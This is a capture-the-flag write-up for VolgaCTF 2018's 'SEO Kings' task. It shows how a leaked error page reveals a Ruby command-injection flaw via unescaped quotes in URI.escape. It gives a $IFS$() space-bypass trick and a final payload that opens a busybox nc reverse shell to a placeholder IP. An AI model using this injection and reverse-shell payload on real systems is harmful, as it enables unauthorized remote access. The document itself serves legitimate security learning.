The site exposes SEO service which requests like this: ``` POST http://seo-kings.quals.2018.volgactf.ru:8080/ HTTP/1.1 Host: seo-kings.quals.2018.volgactf.ru:8080 Content-Type: application/x-www-form-urlencoded Content-Length: 7 site= ``` If an array is given as `site` parameter, like `site[]=`, the server emits an error: ``` NoMethodError at / undefined method `gsub' for [""]:Array file: rfc2396_parser.rb location: escape line: 305 ``` And guess what? Some partial source code is revealed in the error message, and there is: ``` /opt/seo-kings/app/controllers/main_controller.rb in runAdmin pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'") /opt/seo-kings/app/controllers/main_controller.rb in block in runAdmin(site) ``` Look at **`pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'")`**. `site` is user input, and by URI.escape, '(0x27) is not escaped! So there is a command injection vulnerability. Since all spaces including %20, %09-%0c and [], {} are escaped (and dollar sign is not escaped), I could use $IFS to make spaces in the command. Like, `ls$IFS-al`. But if non-first arguments doesn't start with non-alphanumeric characters, it'll become like this: ``` nc 1.2.3.4 -> nc$IFS1.2.3.4 ? $IFS1 is not defined, so it'll become nc .2.3.4. ``` Fortunately `()` is not escaped, so we can do like this: ``` nc$IFS$()1.2.3.4 ``` $() is the output of empty command, which is zero-length character. It was used to separate IFS and other characters. The final payload: ``` site=';busybox$IFS$()nc$IFS$()1.2.3.4$IFS$()10000$IFS$()-esh;' ``` After obtaining shell, I saw .bash_history in the user directory, which has this: ``` vi file_wiht_flag.rb ``` I ran `find / -name file_wiht_flag.rb`, and there was: ``` ... 'VolgaCTF{hope_it_was_like_madness}' ... ```